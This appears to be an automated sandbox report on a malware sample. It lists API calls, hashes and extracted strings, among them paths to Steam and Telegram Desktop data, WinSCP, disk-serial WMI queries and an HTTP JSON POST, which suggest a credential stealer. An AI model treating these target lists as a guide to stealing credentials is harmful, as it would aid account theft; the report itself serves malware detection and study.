                                                                                                                                              • Opcode Fuzzy Hash: 3a8d265d7436f248c25574c8b28e521f8651df04f5fc998e26b8b347e887a28f
                                                                                                                                              • Instruction Fuzzy Hash: 781103F15247414ACF384E3E9C88623BE9CB7762B4B290B5AE5B7C25F1C330D586C649
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • CoInitializeEx.OLE32 ref: 025D96B8
                                                                                                                                              • CoInitializeSecurity.OLE32 ref: 025D96E4
                                                                                                                                                • Part of subcall function 025D8B49: GetErrorInfo.OLEAUT32(00000000,?,?,02580204,?,000000FF,00000001,?,?), ref: 025D8B5C
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Initialize$ErrorInfoSecurity
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3572798514-0
                                                                                                                                              • Opcode ID: 738ed9fea0d50f61cf3b7d07793ff43b474b057910ef39b162456b0f15a1ec38
                                                                                                                                              • Instruction ID: ef3db5bf5981c487b9534f22c7b44450ceaa48285ec31f29ad7dd6f64aba8dd2
                                                                                                                                              • Opcode Fuzzy Hash: 738ed9fea0d50f61cf3b7d07793ff43b474b057910ef39b162456b0f15a1ec38
                                                                                                                                              • Instruction Fuzzy Hash: D9116A759087028BD764AF7DD50926ABBF0BF85218F048A2DD9C996221FB30E5D4CB46
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • FreeConsole.KERNEL32 ref: 0256EDC1
                                                                                                                                                • Part of subcall function 02591E40: HeapFree.KERNEL32(00000000,?), ref: 02591FCF
                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000), ref: 0256EDF6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Free$Heap$Console
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2715786339-0
                                                                                                                                              • Opcode ID: 7597654d3ad681da1decc7d66c3477de9babbf6b88ba928b45b4c0fce01ce6f9
                                                                                                                                              • Instruction ID: 48c580afbc120fb016b27b37c58e0518e429509667f8af1198976ab81c0d9b27
                                                                                                                                              • Opcode Fuzzy Hash: 7597654d3ad681da1decc7d66c3477de9babbf6b88ba928b45b4c0fce01ce6f9
                                                                                                                                              • Instruction Fuzzy Hash: 4501D6FAC811065BC7747B35EC0EA6E7B39BF90240F045424E81886244E734622DCFDE
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • HeapCreate.KERNELBASE(00000000,00001000,00000000,00415EAC,00000001,?,0043A478,00000060), ref: 00418886
                                                                                                                                                • Part of subcall function 004188C6: HeapAlloc.KERNEL32(00000000,00000140,004188AE,000003F8,?,0043A478,00000060), ref: 004188D3
                                                                                                                                              • HeapDestroy.KERNEL32(?,0043A478,00000060), ref: 004188B9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Heap$AllocCreateDestroy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2236781399-0
                                                                                                                                              • Opcode ID: 081eba9be5826635cbb7a29082c7bc61fc15faa81be005bd4fff385f22785363
                                                                                                                                              • Instruction ID: 558faf22d0d10c49c59805d7195a1265b1ee3e9db6c9b0bb3573a997b10f9ed6
                                                                                                                                              • Opcode Fuzzy Hash: 081eba9be5826635cbb7a29082c7bc61fc15faa81be005bd4fff385f22785363
                                                                                                                                              • Instruction Fuzzy Hash: C3E09A78B113029AEF507B70AC057AA3BE4EB64746FC4883EB404C50A8EF2888849A0C
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 621844428-0
                                                                                                                                              • Opcode ID: 0feb59d42df1779b953abbd346d45c634504067f4333d6dbf2f440735a7346b2
                                                                                                                                              • Instruction ID: e7643214fd2a533918b3c2fba7c6d804e3279d3c18b8162a5738ce92749cc464
                                                                                                                                              • Opcode Fuzzy Hash: 0feb59d42df1779b953abbd346d45c634504067f4333d6dbf2f440735a7346b2
                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0040A740: GetVersionExA.KERNEL32(00000000), ref: 0040A753
                                                                                                                                              • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,00000000,?,?), ref: 0040A7CC
                                                                                                                                              • DeviceIoControl.KERNEL32(00000000,0004D008,?,0000003C,?,0000022D,?,00000000), ref: 0040A86E
                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,SCSIDISK,00000008), ref: 0040A8BA
                                                                                                                                              • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 0040A9B2
                                                                                                                                              • DeviceIoControl.KERNEL32 ref: 0040A9E9
                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000000,?,00000018,?,00000000), ref: 0040AA7B
                                                                                                                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040ADB1
                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000000), ref: 0040AEE7
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$CloseControlCreateDeviceHandle$CopyDirectorySystemVersion
                                                                                                                                              • String ID: DISKSERIAL$DiskSerial$DiskSerial.VXD$IOSUBSYS\SMARTVSD.VXD$L$SCSIDISK$SMARTVSD.VXD$\$\$\DiskSerial.VXD$\IOSUBSYS\SMARTVSD.VXD$\SMARTVSD.VXD$\\.\DiskSerial.vxd$\\.\PhysicalDrive%d$\\.\SMARTVSD$\\.\Scsi%d:
                                                                                                                                              • API String ID: 1683039047-3280731534
                                                                                                                                              • Opcode ID: 5381b5551287e4adfd786a5f55f6f4a67c4bd9771a8bb3c3fab6e6aed8b98872
                                                                                                                                              • Instruction ID: 93a60672a8556de03baec2beb5f329e244e6174530f919b371a39b0e8372696b
                                                                                                                                              • Opcode Fuzzy Hash: 5381b5551287e4adfd786a5f55f6f4a67c4bd9771a8bb3c3fab6e6aed8b98872
                                                                                                                                              • Instruction Fuzzy Hash: FA7246723003045BE328DA389C46BEB77D5EBC4310F544A3EFA5A9B2C0DEB99909C759
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 025D04D0: TlsGetValue.KERNEL32(00000000), ref: 025D04E9
                                                                                                                                                • Part of subcall function 025D04D0: TlsGetValue.KERNEL32(00000000), ref: 025D0510
                                                                                                                                                • Part of subcall function 025D04D0: TlsSetValue.KERNEL32(00000000,00000000), ref: 025D055E
                                                                                                                                                • Part of subcall function 025D04D0: BCryptGenRandom.BCRYPT(00000000,?,00000010,00000002), ref: 025D0574
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02577B39
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02577B7D
                                                                                                                                                • Part of subcall function 0257D120: HeapFree.KERNEL32(00000000,?,?,?,?,0257735D), ref: 0257D16E
                                                                                                                                                • Part of subcall function 025728BD: HeapFree.KERNEL32(00000000,?,?,0257F7AE,?,025FF438,0260D02C), ref: 0257295C
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02577B96
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02577C8E
                                                                                                                                                • Part of subcall function 02572678: HeapFree.KERNEL32(00000000,?,025812D5), ref: 0257269A
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02578000
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02578019
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02578508
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257858A
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025785DC
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02578661
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025786AF
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025786CC
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257889D
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02578A33
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02578B5A
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02578D80
                                                                                                                                                • Part of subcall function 025C6A20: SetLastError.KERNEL32(00000000), ref: 025C6AE3
                                                                                                                                                • Part of subcall function 025C6A20: GetLastError.KERNEL32 ref: 025C6AF8
                                                                                                                                                • Part of subcall function 025C6A20: GetLastError.KERNEL32 ref: 025C6B0A
                                                                                                                                                • Part of subcall function 025C6A20: HeapFree.KERNEL32(00000000,00000002), ref: 025C6B80
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02578EA7
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025790AA
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02579222
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025792B9
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02579318
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025793A3
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02579551
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257956A
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02579583
                                                                                                                                              • GetLastError.KERNEL32 ref: 02579693
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02579803
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257988A
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025798DC
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257992A
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257994B
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257996A
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02579995
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025799B2
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025799E0
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02579A84
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02579AA9
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02579BA4
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02579CFB
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02579D14
                                                                                                                                              • GetLastError.KERNEL32 ref: 02579D2E
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02579D61
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02579D7E
                                                                                                                                              • GetLastError.KERNEL32 ref: 02579DC0
                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02579E1A
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02579E77
                                                                                                                                                • Part of subcall function 025617D0: HeapFree.KERNEL32(00000000,?), ref: 02561998
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02579EC8
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02579EE1
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02579EFA
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02579F2C
                                                                                                                                                • Part of subcall function 0257FB9E: HeapFree.KERNEL32(00000000,?), ref: 0257FBD0
                                                                                                                                                • Part of subcall function 0257FB9E: HeapFree.KERNEL32(00000000,00000000), ref: 0257FBDF
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02579F7C
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02579FA0
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02579FBA
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap$ErrorLast$Value$CryptRandom
                                                                                                                                              • String ID: Bj0Y$Invalid$`async fn` resumed after completion$cannot access a Thread Local Storage value during or after destruction/rustc/25ef9e3d85d934b27d9dada2f9dd52b1dc63bb04\library\std\src\thread\local.rs
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • HeapFree.KERNEL32(00000000,0257CDE7), ref: 025A0462
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A047B
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A060C
                                                                                                                                                • Part of subcall function 0257FB9E: HeapFree.KERNEL32(00000000,?), ref: 0257FBD0
                                                                                                                                                • Part of subcall function 0257FB9E: HeapFree.KERNEL32(00000000,00000000), ref: 0257FBDF
                                                                                                                                              • HeapFree.KERNEL32(00000000,0257CDE7), ref: 025A06B0
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A06C9
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A07AF
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A0C60
                                                                                                                                                • Part of subcall function 025CFEC0: HeapFree.KERNEL32(00000000,?), ref: 025D0037
                                                                                                                                                • Part of subcall function 025CFEC0: HeapFree.KERNEL32(00000000,?), ref: 025D004C
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A0CE0
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A0F10
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 025A0F85
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A0FE5
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A10A7
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A10F1
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A13F9
                                                                                                                                                • Part of subcall function 0258172D: HeapFree.KERNEL32(00000000,?,?,?,?,?,025BC142), ref: 02581775
                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000), ref: 025A111E
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A12D1
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A14FC
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A1592
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A1695
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A1700
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A1724
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A17A8
                                                                                                                                              • HeapFree.KERNEL32(00000000,00000004), ref: 025A17E8
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A1807
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A1827
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A1840
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A1A0F
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A1AA5
                                                                                                                                              • HeapFree.KERNEL32(00000000,-0000000C), ref: 025A1B12
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A254D
                                                                                                                                                • Part of subcall function 025617D0: HeapFree.KERNEL32(00000000,?), ref: 02561998
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A23D7
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A2413
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A2432
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A244B
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A246A
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A2483
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A24C5
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 025A24D3
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A2504
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A2572
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A2591
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A25AA
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap$CloseHandle
                                                                                                                                              • String ID: APPDATA$Invalid$e$l$q$s
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258C4D3
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258C4F2
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258C866
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258C988
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258CAAA
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258CAD6
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258CAF6
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258CBE7
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258CC06
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258CC21
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258CC36
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258CC4B
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258CC60
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258CCB2
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258CCD1
                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0258CD82
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258CDA0
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258D092
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258D3DB
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258D46F
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258D488
                                                                                                                                                • Part of subcall function 0257FB9E: HeapFree.KERNEL32(00000000,?), ref: 0257FBD0
                                                                                                                                                • Part of subcall function 0257FB9E: HeapFree.KERNEL32(00000000,00000000), ref: 0257FBDF
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258D713
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258CE30
                                                                                                                                                • Part of subcall function 02596AA8: HeapFree.KERNEL32(00000000,?), ref: 02596AD5
                                                                                                                                                • Part of subcall function 02596AA8: HeapFree.KERNEL32(00000000,00000001), ref: 02596AE4
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258CE49
                                                                                                                                              • HeapFree.KERNEL32(00000000,0257CDE7), ref: 0258D126
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258D13F
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258D232
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258D24B
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258D268
                                                                                                                                                • Part of subcall function 025CA3F0: HeapFree.KERNEL32(00000000,00000000), ref: 025CA5D0
                                                                                                                                                • Part of subcall function 025CA3F0: HeapFree.KERNEL32(00000000,?), ref: 025CA5E1
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258D77E
                                                                                                                                                • Part of subcall function 025617D0: HeapFree.KERNEL32(00000000,?), ref: 02561998
                                                                                                                                                • Part of subcall function 025CA3F0: HeapFree.KERNEL32(00000000,00000000), ref: 025CA615
                                                                                                                                                • Part of subcall function 025CA3F0: HeapFree.KERNEL32(00000000,?), ref: 025CA626
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258D7EE
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258D80B
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258D82A
                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000), ref: 0258D8F5
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258D987
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258D9A4
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258D9C2
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap
                                                                                                                                              • String ID: !$)$APPDATA$C:\Program Files (x86)\SteamC:\Program Files (x86)\Steam\config\Telegram Desktop\tdata$Invalid$a Display implementation returned an error unexpectedly$c\winscp.rs$grBH
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257B78C
                                                                                                                                              • GetLastError.KERNEL32 ref: 0257BA1A
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257BFD4
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257BFED
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257C006
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257C01F
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257C038
                                                                                                                                              • GetLastError.KERNEL32 ref: 0257C05E
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257C091
                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000), ref: 0257C0BF
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257C124
                                                                                                                                              • GetLastError.KERNEL32 ref: 0257C15C
                                                                                                                                              • GetLastError.KERNEL32(?,?,00000000), ref: 0257C1A7
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,00000000), ref: 0257C1D6
                                                                                                                                              • HeapFree.KERNEL32(00000000,00000001), ref: 0257C1F9
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap$ErrorLast
                                                                                                                                              • String ID: //:p$//:p$POSTHTTP/1.1Content-Type: application/json$`async fn` resumed after completion$http$http$ptth$ptth$s://$s://
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025B83FC
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025B8BF6
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025B9082
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025B9147
                                                                                                                                              Strings
                                                                                                                                              • assertion failed: output_position <= output.len(), xrefs: 025B9316
                                                                                                                                              • assertion failed: step != 0, xrefs: 025B93BC
                                                                                                                                              • called `Result::unwrap()` on an `Err` value, xrefs: 025B9412
                                                                                                                                              • Invalid, xrefs: 025B92CA, 025B9389
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap
                                                                                                                                              • String ID: Invalid$assertion failed: output_position <= output.len()$assertion failed: step != 0$called `Result::unwrap()` on an `Err` value
                                                                                                                                              • API String ID: 3298025750-1422663253
                                                                                                                                              • Opcode ID: c08e4f8ddb0fcb41c58042be634559c60decc6de5cc2fe229be292bb6c3eac54
                                                                                                                                              • Instruction ID: 937af9f630f861c76d1c22b4cacb41437cbb8b01ca02bd09c0797b47175fc7ef
                                                                                                                                              • Opcode Fuzzy Hash: c08e4f8ddb0fcb41c58042be634559c60decc6de5cc2fe229be292bb6c3eac54
                                                                                                                                              • Instruction Fuzzy Hash: 3B42B171A083419FD726DF24C480A9BFBE6BFC9304F14895EE58A97291D770E845CF8A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • GetVersionExA.KERNEL32(?,00000000,00446FF0,?), ref: 0040A15F
                                                                                                                                              • CoCreateInstance.OLE32(00437030,00000000,00000001,00437040,?), ref: 0040A183
                                                                                                                                              • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000006,00000003,00000000,00000020), ref: 0040A1BF
                                                                                                                                              Strings
                                                                                                                                              • SELECT SerialNumber FROM Win32_PhysicalMedia WHERE TAG='\\\\.\\PHYSICALDRIVE3', xrefs: 0040A209
                                                                                                                                              • SELECT SerialNumber FROM Win32_PhysicalMedia WHERE TAG='\\\\.\\PHYSICALDRIVE1', xrefs: 0040A1E3
                                                                                                                                              • SELECT SerialNumber FROM Win32_PhysicalMedia WHERE TAG='\\\\.\\PHYSICALDRIVE0', xrefs: 0040A1D0
